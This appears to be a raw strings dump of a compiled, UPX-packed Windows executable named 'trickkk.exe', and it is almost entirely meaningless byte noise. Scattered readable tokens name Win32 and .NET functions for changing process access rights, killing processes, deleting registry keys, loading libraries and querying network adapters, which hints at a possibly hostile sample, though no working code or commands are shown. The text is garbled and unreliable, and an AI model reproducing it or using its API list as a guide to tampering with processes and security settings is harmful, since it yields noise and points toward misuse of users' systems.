6$tI
>)VI
2G^HC
Gi];
m/+hX%Lm
:DT^hpy
U"huZ
r2 l
eA5p
{=y
DQy_
ubYD;
dJ[b
Ml%=H
)t /L
'~; b
\ >e<
RL^
trickkk.exe
fJ@V
JF'xw
ttJU#
mA `
CguJ
N])V(
|*R|
/nda
0n
]rVe
|cJg
Y }
LHHL'
[}e<
M. |
-}tj
\= u
x_><
{0D,D
x6 _
-% Z,
N o^
'x@[
5-?a$%h
F_EXTN
.Pti
4J`t
F1vMr
jPOB
O8O[50
xv yp
0pY
,><^q
vIJw
((((j
z,Luv5
x86_64 AES
Hw}
`BHj
B`zG
%7l2t d
O`d8g
W<0!&
oRAk
b}2o+
Ef8PPV
| 9m
Ze a
5'i
gAy d+
((,BI
Ze u
}' g
fG
}:5(
_to$
.1)Q
DF(x
.Uzo
WExIlJ
>~.A
ES%?
r ,@
;w$I
near
|;nz
ZWq>!
]||
L|`!H
wau;Pde
-} j
s_)?
DZ+hq
::7+J+
!8!/ 5
!Cr<<8
5-SR
dX+ #
/)4n
V S
#;e,5h
;9
Fl -
2F hd
:jhS
0Sd>
?&s +@
> w
=KuJ
IC i^
FyF####FFFF
X3fY|EQ
J7K3H
eaG`
System.IO
WrapNonExceptionThrows
Go_%
0D~r
d&X%
zrjJ
=i ^'v
{us,
8otXp
z,0`
Acqu<eC
1lVvk
8D466
,nNP
H\LX
$eGN
get_InvariantCulture
9`>XT ?$
zMWR
4=K
"|ptg\$<
P8Fh
BaU8!RM!
H`t@
pxts
soPG
!jNa
UMC
wH"Zdc>?R]
)xA9
(A \
N xd+
Jvh@
pZ.
m$
8dBt
$(4o
(d!A54$
Zr\p
YGx
afga
u Tu
dV@+
x3!ZIYf4
a>lX
rX+^
#=)H
X! A]
.\&y
(_tML4
F;)R
RyM&
YRHI
tcI
Ie@
'iUK
,4\.
4.1b
1C,^B,*S
[OAu
vD[\
IKL|
CLsDE^
lXhU
aC;51
EiZ{x
W d Aof
2%_7`
,t-2
.FRp
eh5e=eh.eh1eg
d56X{#
A=P4
C /9
, j(
VirtualProtect
$XO&
;W(Zm[__G?
2z@(
U`o<
m< 7
pSta%B
,CI#
q Q(
tg????
:>.
# 8q+=
SSt {
A$/j
Bq,O
AIt(
.88>(({:??>?{:
X+<
2E+k
2 zo
4(tX
P,K?
System.Diagnostics
LAPP
LaD
f?(D
"2.0"
ncvZ
q1]>p{j>
0YUl
_2\Bl>
`p"t
[/{&m
\d=o
wELJ
uppP
]-0
-L,0
NOTAVAIL
mK1U
;p_F
L>;@
0X Hu7
= l
N2D@
XdvuM
a\ w
{Kxc
@vk8
W7M9
-}Dj
ZZ H
dNV?<
(5Ewv
!LZa *
.8BLvr
yEs o<o:
$G}@~
<G/t
M:f*i!n
0I8@
f$d(
G<A
L ||
J9YZq
InsertAce
l 3l
e-g%
=17!!= xE]
XNh%
______________
TjK
!)L-@
GwL/
a k#
ma,>~npZ{
$?*H
FOA:
+ >
):x1
+ 6
get_BinaryLength
W Ts
Q LElr!
ZYdddd[^_]F
4,H_
:##>p
+ (
h`{>g
SR<]'
y`jx
7t)%#
~BX?
4>,4
(sx%v
V3;G
LlzH
` y.y.0|y.y
____
$qw7
@.,0pFHs
8+Q?
&hP>
5\Ux
{=8 p
h]Bi
`29t
CS&u
-})j
93"%EZ'K
?9*
"lR<pP
t7Ic
pU9'
)p4?
r$PP
:]I<
2z2,
&2D@-
WaTt\
t
F i7
5;p4
<B^j
+yEX
I&PX`-L&
k =O7
f@3l
Hs0xh;
U; C,
N4 A"
?C)PQ:
Vym i8
4M00448
\Ls3
:1aZri
tX4Fr.rh.46Aw-wl-6
dZa
R"&
Ov)GvoH
qo!2u
GPqP,n
TF`8N$<
"###
lpl aq
pvH8
]'(2ds-1
s`T
L JSiFx
'KW
Vw 8^
X w D&
<uH,\
0Tddd
q<X:
J ?
Z g'1K`_
I}w\
d 3Y
mI6I
h_H
6[H1
AceFlags
DeleteSubKey
{`T.
|FNhD
\"?]H
~m9ht
p$8W_
[ PGCT
"S7
]a.3
:; Z,$F=
-}rj
e [{c
d7_o
[(20
IS?u
*R87
RBdd
x&Zx7
5xKY> /
}'""
Mp bc?@Q
X-\
< *-
Y;D'
E~Dl
@h<x)
yDRl
z|yq)
L66XB"
OP MF n
+ ~
%Z
ND|"
{3p(z
y]B-
A#G
v )>
BBg 0
zuj`
bKTk
JSON *3'M0
ePV%
386 AES
}Ti#D
bZICw
8|4-
h4 l0
UUDPG
)Blfl
oaA0
QJHJQ
# ok
i>XI
BHH,
o\9P`
b,8|?
L'9e
BAT_ARGUMP
h c4
'|X+
2)e!I8
iWQWQW
J+%@a
xhX<
UInt32
USER32.dll
\Hvq,-@]VPL
QN;i
_"acm
"PT)
ML\B;~Cd
,Rk(
resource
##eo
9r= X
dd`p
h_Ls00
>M h
98y45
cE@o^
+l}_
rPzE
AoAC#
Split
h4i5%
$8O
bT[
6,~%A9
yOi.
A0B._
7#yo
uV8tR>S
) AB
FN ]z]
$Y G
mR< <
___________________
_ ns
CKl:
c_aO
C88A
<L-N
AssemblyTitleAttribute
@H^y
cEkG
G`.@
ut U
= 23J,'
#p4o
~nNNNN^N>.!XNN
H4L<0
%}YP4p
i64/\Dy
A9Wlu
rpi >
5KYS_
Z+D45
key
nWQv
5*pu
x/ g
]WO(
+7 @
*@P<
!WHeI
J0_y
E\'n
JGO}himqqu
i{D\
X+:
XIIM
3|&B
V! nbisw
Z@`8
/*U@
TS n
U|JMd
@P#L
f MB/
09RK
`(k+
zD?:
~==B
/4P^=
"#@
1q"OG
$=?g
n'N:y?
VJ$rJ_wS
/DFlz
9Qk_
Int64
G ARRAL
<P=%P
#6z+
h |"
ukErE06
O@uY)QuN
6'?*)'"h#>#ao}
b/$'-
;v :`
?FZ[:
>JL1T
(/| J
%(6
J<;<>
\42c
qe,n
(h?h
(4 4
CommonAce
d$.H/
8m<1*
ll]4
,9H
<=d]
bBM@
QD/@1
V [ /
{ 5`
+=KY
G u6
X>mo
R}"+30~6
`CbDb
$;p u
WtDQ
"&''
I:lt
(L/ME
AV~;E&
d_!(i
* 2I2j
xcNTLcUNQB
0$t?&
9999"4HT9999^lz
beZ_3
EXIS&x^
BFFF
)SHpDK
^]p
[^ l
<& t
GetProcessesByName
A{$Q
d`
>t \V
e<V>
SpecialFolder
0ukvR
$e`H
?Y@B
HK {
J2m h
hR'`C
V0*{
_"02
(6N^ry
sNA\
08$'!<h;=++-;;h.':h3x5
2ourc
8 $X
EXIS&x8
.
d`b
uEV@(
&l]u>
~ L#'Q&
#Jro
Gl684
d n
WAIT_OBJ
3'L:p!
F@cON
T'pL&X
l4v@mZ'
rM r
H?~F
y{VZBf{
f+
KN:X+ ~
BX6i
+Ca[
5Xh!,
-> T
SMeg0
L00apC
m9KR
<J\0
?2 C
xww <X.
Mn_BYTm
`O,t
4Zxh L<
GsB10
A!Cd
efSA
$=M
}T F
h4s%
>/('
N8M
0[j /
A.2w
z\f
gEV(M0Kl{
_0VO
M 84b
|\,Z 7
mr m
________________________
hsH7@
FyE,
_____________
j{z3
#u6N
<}'
vH^W
]HX
lYO8)
<.T$o
j_9H
#&jsttuj~v"uj~!w"utwv&u~p$&$q"%&uj&!&qjs
@rtbig
iWz=QG
BHmA
k#Af
ph]sjU
Aj [
luC_
i"
@n 9h'
H& 2
IyIc
TX''''\`dh''''lptx
+lXm
lqb%
[Pmv
z@urQ
($kC
d x0?
cuS<vuO
0`4)
@` +T
WPO`E
66*T
d-%02 :]
K@S
BuZk
2\3.
?:uH
Exp
R_X.(
^Hsq
3?)!Q9
P7O7
uTQG>
i>=
0K VH
X7dL
| x/u
k |P$
n+Vb8
+e
BG;?
6ppX
;Xpu
$gC|a
`KgV
LV%j>
w?` r

`85_
AGg7
c&,
<zuW-
pZ8F0
]sm>
ix[O
P/rH
!gIh\V
d"PP9
8`Eu'M
`LoI
w<<o
>Typ
c/Go
m2um
]EWc
l2V"K
9S 99
aGkp
tUz0^
rZy%{
-cp
m2uV
lH~IH~
rXxA
L`!v
u(`p
[ KV6)
#\l\
+ !P
5NlQ
ZS>8E
xHKi-
~mST
tP0l
X\k8
0)ZQ[
m`um"Ou
< ]
V`6h
3J$3
@K_fp
RuntimeCompatibilityAttribute
E2BIG ACCES DDRIN
N(o8
tj<Lt9~z
8a1dJ
^= x
`dhl
XafAA
t7f|
wwNF^
=p$T&J
+;:a
dj!r
j0II
QAEX
*kA?AT?*
ZjE7
l| 67
8fyy
j*atRxH
5< &}
X#|YX
>XG>
*"H_
USERENV.dll
zu.
W i6G
t?ia
wX+ ~
u 0C
*KTYP
&WLZ,
} $0w
p|N)
HDuY
_GLOlL_L9 u3I
9J 4
t"Gw
{/X!f
"Vlx
rrrr
l'9,<t
?@~c|j
LoadLibraryA
A,,^l
kt L
#(Z'
]`3*
BB0
Rxuh
u n@
N7_(
Ev"c
-}'j
Oxf
$\\|%
,c r
TF_EXE
rhdP
R^ V
B0$p?
Xp9i
0[ -X
2EpS1
A f3
ManagementObjectEnumerator
scYWt\
FC:Q-
Mis&=Au
;AZ%
86bA
y 2 2<y
AjnLN
L% H4
\IjH
jseX
\ ]{5
R r
F8SS[
J=0FF
JG`"
T!9
``)G
i8<a
*MEo
@U@(
+`/ i
NR~EN
|uTtv
eY:j
vu*,
yGR,
q<yi
e f
}oguBr='3
W x<A
plX,b
bt 4
(R) [im][357(W
:bWLhEN
U4rP4
_______________________
.cctor
AVAY
HPi>
'> @x?
N_
C,Z,
yrxa
` l.
N8 @ <N
MY\9l
D? L
z 3 jk
0>`o
&DLiz
m=h
3 t3?Pj
8$ty9
<*C.;S
\ FS8
N6tW
Kill
}$<tu?
K /r7-s
5 %'@V
wyWu
(H o
yQ#|
R }Z
E K
}>8h
Unau
j]w:-
;h\H
D'@
N,84
$ggds
;=(x
V8U*
'oxG
AJX
10|_
System.Reflection
0xrr
ju0$9C
W2u
+f""
`h/p
<O$@Rf|
;dEA
t66
.Z{|R
*QAb
e@FMJ
kg%I%
A&6LKZ
'\dR
voij
qpOt_{ X
Tb
V}Luc
P:u<=O
x `5
fd. \
XTB%X
O:4-
X(;(
Z ~
o($&E[[E
5M\`dz
%n<p
tPB
EJPW
. Op<
?83&
b4""
WPX*
N02,
!4CK
zPvp&
1N3v54n
? cb
ComVisibleAttribute
bexpV
b 0 ` p P
| {"
towM
D;d?c/)`
5t=9
Iq:B
DhS=a`E
N6<1
03.1f
M4L.
|Fthl.
7.X.L.
P,(
1l$hB
OU.9
< EV2
v'cI
h rzt
-}%j
dE
Z{<|QV
pKl ZR
hJNl
<;7(
4)%#55fc
#+|B
\-c6
6B"u7
}7~S
VP-}s
dKb1
u-|
>H=3
WR 6
gG .
Vc@g
8N3wkh
UmaL
v rb
E\25
_V(GD
&,RHc
B-Z
XZ%b
sizeof(
UFU"`
toRuJ
4pt=8
X: )M
)>#G
6U7i7VVVV
0N$3
2+hiiW
@ 9~
hQrN
A.xm
ACB_Dw
o6 W0!l@u
~ghom
H h9"
LX+ #
0ig ^<
0@@ c
N{t0_
A q#
U 4I
/L l
xGiY
uc ,B
u;(/T
?r5 f
9pLh
?Fw+
<84
M0g&F
oq[Yf./fm
@lEA
:$zfrE
.mH;
d_X N
P@H
^+I't?
0Hn *V3BE
8N"
HXu
4 C.
,'`
QlG '
v Qze:
8DVVV
!_Ei
O Fg
L)x6
tLHZo
T\P~
M _$
>d,.
FH4mE
R/ 1(6
[E$p8
;^sOi$th_
DtM
<H^X1
lN%S
)d6/
$a+'
<T?5
hOq
rb76
tcvQ
<\H6,j
<9JLX
8EOB03!
4q40\
T,.\ \
SeekOrigin
n[!'[''{`
CLvt
4n^1`
ZW$7t
d e
6!7Vh
tuLJ
'jPNeov
$F@Q
,t=+
Sjar
DUo.
xv_ry
B M
Microsoft.Win32
:JtdT
"Zd$`
$ Fr
aE8|
wXV@
!.#Z#M
6d7@
ZXZ
-, Q
~hH,7
)[%x
(<N''''^x
ddd
a4c24Eh\
;Fht ]
<0z
Czw`>
k@P7j
*Hi0;
')\Km
dPip
HGg/_
y$A
ccg-88vg~9~g~qn9xep8pY
d$xD
\h`^
H.X,C3[
~ o,~<~ws'#nd
jP*Q
3ei
_______
}@tI
uwleK@
p`a
~;k,
i 8.
h a
.3Q4
vz21{
g[ Fwr(5`
#gYw
gdm-
r/L_
w( u
'xSc
o w
}RM\.>x
ghF|
\!i^<
4:1B
qJ5*
8u/5
Etxe
I>mM
Xrem
8tU
Xi b
Ea*9}
DJ>u
+ ~
hcke E
Rp g
EsA;!
\ `4O
aF4M
foSiS
)RDZ3
)w4`
4E)=
TNMu
UaR ^H>U
`}```
x &4
(Q)c
G"0
ZXf m!
1B2FL
$*G<
M3K\J.
Jk*y
H3-Q
`~sd!
}7Q\@f\
- ]6U
Q| =
m=X+L
~ vi^
~n^N
U 34b
|3<K
) [im][357
L#<wu
FpcAR
^E'j
xDj
/<r
yn7!
ptptyF.
dt[+
r(y9O
Do|
s(v6
dh ,h
$~xO
83=@k
SVWUH
X+ ~
UBxh/M
@)e t
[s(\
v-W_
D`VW+)
L%<E
t40i
xCB\:
VtNA
NexD0
zO#G]
F :u"
u Z
!I\[
78*
+:dt
|Sj9
r|(e
08C@''''HPX`'
dx\8e
<"h
31&L0
\;Tw
.^8j#
Dt =F
GdhI
md}F
ap 9Ly`
`ZG !
? G X
!pul
H>xJ
P-}h
&lKd
(u2/
:haJ
Rev2, B
5`:04
W\ 2Mhp
F D
Xl_:
&U@0
HL &
X+2
5n)]
WK9D
G@hZ[5|MpIh
'}<f
vc6kp
,iBA
~ x).{e
Eam.Z
j`B]
V CC
xcnS
+5~
Px:tR:.
hNH
2~E
KmjX
9ZxE
O&pu
p3CFfi
Wu*Lk>
0S A
/ ``
3~g{w
_FHx
ailF.
6y(
+-~
li?zI}
;O/K
\!m!
zFu
+"wU3*
jt6wJv_RKClasses
P@PH&
H")-
t$cX
tqt br
r&w
99y.
F,N
tX+ ~
Sczn]
jx r p
r@44
P-(m
Xz"
J{e
HHH6
_R R
System.Resources
s;|(
8$<(
GetString
YIPj
`L9t^
hHqZ
h+e
Y@b8
] &C
\ UsC
S;ZI-
k{P=
V@kD
A(<mtc. /
+_.wH
Co+
SZCu
LF\:
:UZ
wtTd
T)wK
V,:
.d(9
S` L\
p.d@
Jh-Y
/:*\4Z
32--
vB0F
_jJ_ V
`j?Pi
f@:x
qN$!
#_D33
0W _(V ^(
|%xF3
DyqJ
C !
MLmx
fW@DQ@jGO@FQ
RaPi
'_.`
jgj~
>5gE
FAM e
4b< (
XMRL 10
pn cc{
GJLaaCT-
>o3X
!@I
' T )
i[BaHo
*7'PFA~()
TLD|
X+1
UJ p
$wp
/`n0
x9999hd`T9999L<8(
H<W!
| 50
`a!y
0=(Yy
xpj
2;"L
@{0.
b rR
v,q'
EM[[
/u8
{<}$
B.77Jt+y
>L7gL
M}2u
tM|$
O ZGO
jwJd
XStX+;
9w6l
67>h-T
f~p
5J.DED?1
u[;:M =M
NVTC
6 -JD
OegP
?C!x
"j3p
>, !l8
2;x0Cf6KrP0F4
cL7
XZ?=,ZTXZAOC
failF.
{6z[ O!
3FX^
DzX+
rWYG
Mc G
v=r\
p%&x
+t&+
jhrVk0
Z+RmQ
rM,X
FXv_^
CtPUJ
A86Q6
5+E-E
D;Q,};@
UpJN<~
nBLE
J8UvI0(
D} ^
>5ZgG
!B$
^Yim
_J$Unh
>wy 7
?D0l>
48M
!b[^
i>3e(@
88 :u?G
o0" x
N"-y
ho:"keep
A7+=d
UJF SGV
dD0p
ZtiC
[0)5
KQ'Q
rX+4
6 /)
Lf#>
@ O,t
v b
ty;*
ZXe
Wl#o
E;w#E
j55_
DebuggableAttribute
0|n~!|fJ[X
ZXea
"ftw
H,4
j0MF
ES_b5
fGX*
_eZ [
tne]i
o |8
<nt!
[d4I
wog l
0]m#=[8=
CloseHandle
cmST
X+,~
<BhA
N B5
+t"V
qyIG
r)X
CdM2
@ 0I
hash self-tes^
,3(V
vSR
KDh{
5'CE
QcP9L
fS^u
w@ |~
xifgQ
'.mMa
H A {
6X\IM
tq]Mob
GetAdaptersAddresses
W Br
}S\N
s1(h
Km,A
FN ]
get_Handle
'Ec,$U
WellKnownSidType
vd =
0x q
XgMLI(
|`0
2c
XxH|
n"f
2pN Of
vH?0
/!@.X
%Xl`
ARRA
fNQ)SUI
aue|
o(#n
/%x
-}Qj
k!e~2G<
u1.1
M(5V
2=&520'&!6!:
% H!|
i(0>
<Hr
.8xfSKH
1%Vp
1;37m
s>}
NVIK
o L2/L3{[
S!}Y
t5 Z
* $b
?)](
BoV-vE@
FR1$
8r2#
J0j@q
mk>r
U;SC
w-&
CultureInfo
d7J7\j
mHrhA-
ZX J
8?AnH
\q{!
ZX L
L\7G;
vD;PIv
ZX V
/qZx
Rd L
S3)\
U_AX
lI$M
mkad
S^IZ3
pipe
T2rvd
-`rM
0@?L
K IC
S[l2
94,Mu
~0Ip
hlx|
$++H
WN[S
IsNullOrEmpty
9999(08@
O;mZUw
?X+
f?0D
<vMc
e[4u
t!sC
Yf` w
5_Sat Ac
UX*$5
SM2}
m ddb
)mRU
Q: :N yP
@`lr!
tfjCO
g! #
>oyh
L' tM
cuBh8
hR*!_
)`ty
IFpcT
`t1h|
F F;
'=+;zO
m,bN:NX:,
\hG8
9iN:
INNg
QWQWQ
M5zfv
$>}
'^pn
$GNK
a!e(
XF@}
7Typ
s[lG`
t{G]
}"JA
T}L,C
<Xu@
,H 8_
B' <M,
GC ,
(Bp -
-x !
gRqp
p0tx4
PHx@sQ
_9s,
w?SQ
B[OH
q@<i
p4s
dhjNh
2AeA -
x( d
cE{pJ
bind
JkC:
m ##
1Dx@
0cAI
q[@!
/UKey
$~Z6ZH6$
W40Q
m R
oV`)
,Lq@
VHf@?
=yIi
'Vp}`
Lx8|<
Z0iE(
><M@
V48Q
System.Net
.!aN
;I+;T
>hWD^
I[UK
`Fl =
r X6
()35(++"5
k_` RO
,ugg
%^NR4D 4
)ZV
70I0
or@d
kz#j
2R{R/b
GetCurrentDirectory
EU<r
tMTU
z" n
A 4665
lpvS
nB5e$&BNlU@
VbBU
?jpg
-`QV
O4\
-}!j
nH;}
uv/)+
o=]IZ
,<8
B$4(
$98N
\;3,g9'
Y4AX
tl&>?.
I&u)
BHg
%>o
oi$&
t <0
m-fp
CHARpT
n[H0
DtkK
xI_7
=` 'H'
v''''^N>.
iwX>
C ^K}
9`V|v
4LKTDS
""V}t p
:NLL(wP~
i&ddy&y
L{t&*tU
-u-'e
.$-W@
Pcc/
-&'.
&,t&
-]1' '
\~h.
v2.0.50727
eH<
i?<V
2k p
u,jY
_JJiO
V/'#
SR?3
Jis
Ln1[
&}0J
X?&4Y#
*e!
8xS
# aH
pJB/V
|^U4p%
P Y#9(
I ,x
3
SCLKTD
<siN
1JfG%
b}q&
p9*t
Eb5X
x }?
xitxg1TERM3INT
V$9\{Xr
.LZ@
get_ASCII
6= ^
Lo)i6
$`"*L
^nJ#
.oob
G G
:hJMH1>E
3&9Q9
GetEnumerator
A|8D
L &"E
+\2WAj
~ E9
ReadLine
_:;K
|] A?
x=4O
hfc#2qlvq-
d8],5
<u(u
WyfG
:2^-
^X}I
- (-
qhBcX F
>:tW4
fu<n
B(/9
{Oi.
I B
T_`sh
)y%;
0NNNN
8BLV`
AX_I
L7hidxKj
1hV
b gw
0Q/HZQ
, p8?
wU/@v*M
vKE
zrr%
T2rkX
Zf 1
[u#FP8 q!
x(|6
[@_E_YXSD
7*!<F
@0"e^
rN"[e
x 3>8
m.Ov
k{3M
2cxb@.
#wcLf-K
@tVc
\.113w3}
"4xn
KN*w
na1
/v{y
u&1 U
lU&`
U^h8
X =0r!8XiBig
h>uX
;1~;$5.
== 0
S D
?~9D !
&f,(s
IPV6)ST
QO@KMQ@KMQTgpqkml
U:G&:
j,\B0
S>0Y/
SX-y
-:G[
f A(
hg\U
T9MU
N+}\
=%B?
{W4>
fyw/
Vx.h
"DqHP
8V8 G2r
Gc-v:1
& Z(;
*sXE
+:D3
_-*-
Q4F<1q
@k a}I
3vtt^\
(\ ;
@<Ht&
KP{X
Exists
System.Security.Principal
Z +
0NE)
R<0>(
l6i
40i{
n'2HX
Kq!U6
,'|
. mNl
Ai+ 3 **
Ga44
|p20
&$t4E
wkq>/0
8.%u&
cVTF&
o`A^
M <Y
OCL4
.#"(
s'[,DW
`7KE
iWK0.9
6tlGetV
\FGBFj
oJY`a5
("pB
rG-#
#/a#
noPy
> ZX_ *
93(: D
I(J8
aL7#
C(rio.
PpM1
]|N8
.tcZ
8Gou
[xNC
ztj1
ComputeHash
29eF
`{Oi

3,q3K
Bkcz
yh_Vaa
5HmI
`@&I
'uKQV)
?[\$?_
:^X
ngJtu
[^_]A\A]
P 1]
'/8u
~:Hc#FC
N\Rl$
f 5[
^p
ZX+ ~
p'aT
4SJph
Kib
F}]9
\d%>
@P6hM
bqhi
izRY
iV^4W
(d),$
/4H\
Rp!
mX;ex
#z;CYN
XPTPSW
".ZA
9V 5
UAN^
P*st
fDxH|a%m
cNu
%80
xasGI+:
A<@
x_-jI
HUG,PA
X]pt
tZ~8.
HX:K
q|6uk|
C {O"
@Xu-af
Read
Gvu%
4'B+
y$*r
xPEM]@&
fTm\m7p
JkA[
ZL\L
ramr:
5#t
/^;H
K ]D
4<sl
0mC@
sxgf&
C<p`\
T^~lI
CCiB
upKs
u>$y
~uB`
%9!G
x(HX+)
s!31%8EG
t~X?
BI!Z
n$x,
?D3L
\{.i
Thread
|I;)
7qD)
C%b{
`Z[:
D!4
d P
k $T
W<J/=
6*YX
^I.`
^8j<)
X+6~
%>rSG
k3~ n
SetKernelObjectSecurity
<"'/A
T8t#
;:I.;k)b
MhP
0Hx(x`(07
xA*^
JHLCc
n]TRU
d\|6
v= =FV$
#6^x
ManagementClass
io-3
e ?u
1X+;
A#!K
K,7$
;_HaC`S
B0PA
$-y^7y7
q2!
=t l Xl y
>E>-
B|q&W
5tl$
,h_t
B$0>L^
O| Qr
(u4NZ
Ig j~J
zucX 8L]
V+X/=\
X;8k
17,&...
0qNV
9}{NpA
i(=Krn
C&!`
rq L
x@G]
C_tA
#`q
N'*3Mg
GvPA
sddDA@
>GfC
A5vK
;] sGt
-^&|
doesn'
FSQR
{b\6
$\`=K
tkm |0
7]D
91t3
m5.#
vf8[HT-
GetUserProfileDirectoryW
@DnC(hF
p'.*]
lF:L
4 # 1
xeC
[^mBF
go [
TWZ
(t!6
"uHG
Rm A
OY`(
*$<<a
QDwo
+="|a
L~*d|
R /i
a] A@
JSON *
<:I[
<wMtOpt
25e@
YT3M
FJaw
%x08vC
7_vA
;xp
[XWc;t
yo~@
,|kPS#T#
=4pJ
@G|h
E/K4i?
2oMGx
,KP
M k
i#XA$
Sleep
ep@pE
)<\)
Zx1J
}A E
LZw^
<GD,
[E .
l(lu
I <1<|<t
sH/0\Cp_
RH;H
j+StG
tC:o&rA"Kp
r%fn!
~Uw =g
WZz
H'ZP
|Th4
} -qD
%Id)
PbBj
vAF g:1
l&r@
JAtA
Bl6o_
1&##@
QoWUq
pn
`axx
gYV 5dp
Z{7]t7
{,BZ
[H>8
F{~Jf0C
]KuO
Mgmj{s>\kmj
4ggi
IGW
1 5$E
B ..
.|t=
% I.X_#
-@|ASYNC
T7aO
&`H<
-hp`
3
M 9i
Ws!R
"z\ogb
zC`@
*&H
3j/x
libgcc_s_dw2-1.dll
IPHLPAPI.DLL
4vaa
K3!8
d3kX
|Z[B
uHYLu4O
&HoC
p09Y
wX?N(G0
`q
S M0
P +C0
x|6c
km>p%
-'1w
ProcessStartInfo
WRe
Y\ +
)ddd
t1\F
'xn5BH
7 }#
7T>7
.s|01&63&
0x p
"V?d
@}9@
9'P)
\\
OD9 FY
"\-
r`\6
bM8#
@=<(|
tI R
@,IN)=3 e
KM/P
13mO[%;
YAb+
]< iJ
riXdd\`
t IE
Ke]g
n2("
Ix0&
@Hui
;s4|
<5(@K,
A; h
S? Re
8{lB
koU
.> 9
~ &QX
)q! P
F&mP
_k-a
2+I;L
:|GY
qh (
3,XSE
: %
<\fdd
q4GI
06 '<!,u
V~Z)
lz@C
>3G7r:
4 3~
QlIp
,AsG
L <_
G@"(
g km6
bvX+}
. 0,
n"#[
816&
zo<n
`fHn
\I@8-
ntCt8
Jd,h
PYw
%aa,
L U
PN!i
|%03
o_ S
*mi4
!d(q
T0!17
L0y7g
"c%1
2#u7
H ii
,]X~
pLts
~4u [
AssemblyTrademarkAttribute
SecurityIdentifier
%~5
^`7H
0U"p
O*</B
;c)&
^` ,
CM9X
V(PbC$\E
e|}e%
lb1S
>07/
$d3
5DS%
*aM^d
K&6c
XLY RR
F ~ke
-G/D)
K<, @n
du&
HS2Q2LHL
(|AS%<
u!
1?h$
xY(|,|6
,8( Z>
4X;i~|;z
_
Ee8,
;6?A
?D`98I8 1
=}$m
vR .
84<@D
|Hp$t1
8%|A
.Bf^@vD
B{7`
<0x8
E7L
.%y~
t}kDh
l>($
u$sy
R!puDd f
ea;s
BLg)
O/l1
@&L@W
bg`w
orrrp
@0e{
unHe
7VVVV
:ZX
@eGvn&
7^&u
\ cKQ
i)c8-
G"/o
\t) /t#
}p%\
_PQo
> E(
},ZA
F a'
0^P9
D(Hg-@
tuYK
ht6vudZ
j,VK
q2o[
?E e
hvsa <W
&S\E
hi7r
h$.h
ji~
_ra
UPX1
UPX0
`{uF
ix4\\B
#MEk
;w }%
]Guk?
-}=j
24T{&K="uE
}TTl-(
ASSWORDd
w.NTTZs
R)){
l+x=
kX+
1t,&
hBf,
cB pP0P@0
_9`T
"?#$%
S O|
bOsW
0)^
C54J
GA!Ga
FNX=X
Pfs
H, h
Vt-H
Y /j
}%t)
DlpE
PEvL
T/[X
4$,!=
X+o .
H>*O
cH-*
|IaN
h=l5pt
hsaH
P_`R
lx*L
q?nZ?
e 2!
#RH5
m,bN:NX@
~rror: }?DNS
VShu
opyjE8i `m
WfJR RF
0rrrrHZl
]zo|z4.
T:ZP
^w^w
CS1SRWTj
kkJf
U=u\
ReXa
Mwr #
\\`d
,@ `
# }9
l+o0
I4o3
x C[
cgh{.fH2
&}GxN
p&^j
2G>8
f= t
FPf{4
\6C35
X]_^[H
S|u&-
-z|ASYNCf+{1'~WAKEZ
w?\`p
|c d
t.<C
t<$v
__________________
t- J
kernel32.dll
X[sL
CB P`
Bm;H
)lMyPz
\Rev2LB,
,mU"
4V X!
)p (0
L(|l
5yBx$%
DX93>
yrqZ
e;zB
ot]7o
Dj[c
Wx_cI
T2^0dy
[ Y9
'q`,
7{/o=
,]B4
i_fg
Xwd.a_
h JK!
g@N
(|,hl[
|H -S
H;i(u
pZ"x2 ,{HI
7s 3C
:<yGh
tI_w
flowHru
tRu~
O0 b
o%(^
`|q@
G*q
!(E,w
tGWc
@F<7
K3Xp
@+|q
ntXo
81|o
d*t p
j/9La
UmJc
!`84069
$BdA
GetBytes
b$o!
rdE]
K62_NN
OweL
VERc
vL&m
Ky`y @e
AC&dr
'U*`
sHs|4& J
K|A
H.8
9X)
M;ptJ
;x)
F!wB
@$)D
4?$s
iI=T
Iax^
PREPA
B B3
.cp4
9rJ
@Ru
C`mv
KERNEL32.DLL
#*F_
OpOOg
h8 '
/_Sat Acc
System.Management
o1%ar
[8Z4C
h*nL-#>,B
2ZO
l A
\@i(
C%bACQ
M34B
J.8&?
YpCp
tc1>
'WpJ
G&NI_IFAMk
_&HH
,"u8
88XP
(}L9
IntPtr
?5?
> +
i ~V
Console
-:[ <tN
zP6
QQ#`3
aXs__
7rn 1 W
mq6a
5Ga5?Y
Z#jHn
K8-.!
z(tFvy*c`
2\+AsK
6!5DU3
ELjPR
`?<
XYdf
L,|
W0&%
9qH]
+F~
______________________
q/N9
Nzfh
CLFF
System.Globalization
,Ct-
`%##
-OEJjF
-}>j
e{{e
)x_p
%/0X4
311A1YV
OC~_
?2ZKE
9999
g:|&
xCx}
C@:4
:)
'qZ&
f %
HAM
Bes"
^_`
#PYx
)n5@^s
Fb`%Dm
3_)
2Ch|
1N#
$C/j
IAx(
?{u+
h 7i:2`
y"</
VBl_
iDx+
mZ%`v
FCVC
UMQ Bs~
@hA H
r337@
M V
kA?AT?*
9R2R `
algo
(=Qe
~ Px
t %;
[<#
7vL$
+3Xi
0~= I
R5B
%[Ry
X+ #
Environment
B,Hu
3z jB
dz]v]
]u?U
cB pP0P@
OrUG
m^xXo
hL]7e
SUPPORT
@&=L`
R 2 ^
#[N;jTp
>8;S<
9Nd!S
9\uo y
t+,&>~v
lph
4O$Abx|1
97GrC
J>XA,
=)B%,
$,aU
pvscv
cY93i
f5]oW
-,Bfdx
ejHUY_IIUH
9I`ha
h pB
AssemblyDescriptionAttribute
W h^
8z;3
VPs_
hd-q
] moh
1GrJv+Z
SWH
BJC@
(z1S
#D})
Double
.pOo*
4XBc
r7cV
\>A,
cH,M
`/0
:Ngci<
=2LQ
wrS%
$A;`\
B 4b{
>T ,F
FSGHI$
)v`a
mmbc
ZXeZ3
68P[
A(;AA
HW4E
-F"0
OX ?
JpxX!
-};j
(6Bj
(Bfa
$C2$
gs@vH@
q03rDh
zS'4
-} j
pzu`
,0u :3
>Xv]
hB"
sI2{
yMk|vHLh(
ay9`
Gp!e
qK(9It)p
k(lD<DP<(
H!y5
)XY]
4I
Ft?
G4VM
RiX\
sf C
_#c%R
[0].
PEum(R
vk3#<-VaH)
^Q;=DT?
n1PG_,j
S 6F
RuntimeTypeHandle
'u N
gin{@
@qa/(F+
<fu#
R@ "-/;w
fS.f{`
Ld 0
lhoF
?>+v
`FA
A_/l
QRAPH
m\'|
# {Y
z[ra
PBTd
HLd+
OJq
i&NI_IFAMBY
f{d
S5 w
S D(K
2$lb
k?xt
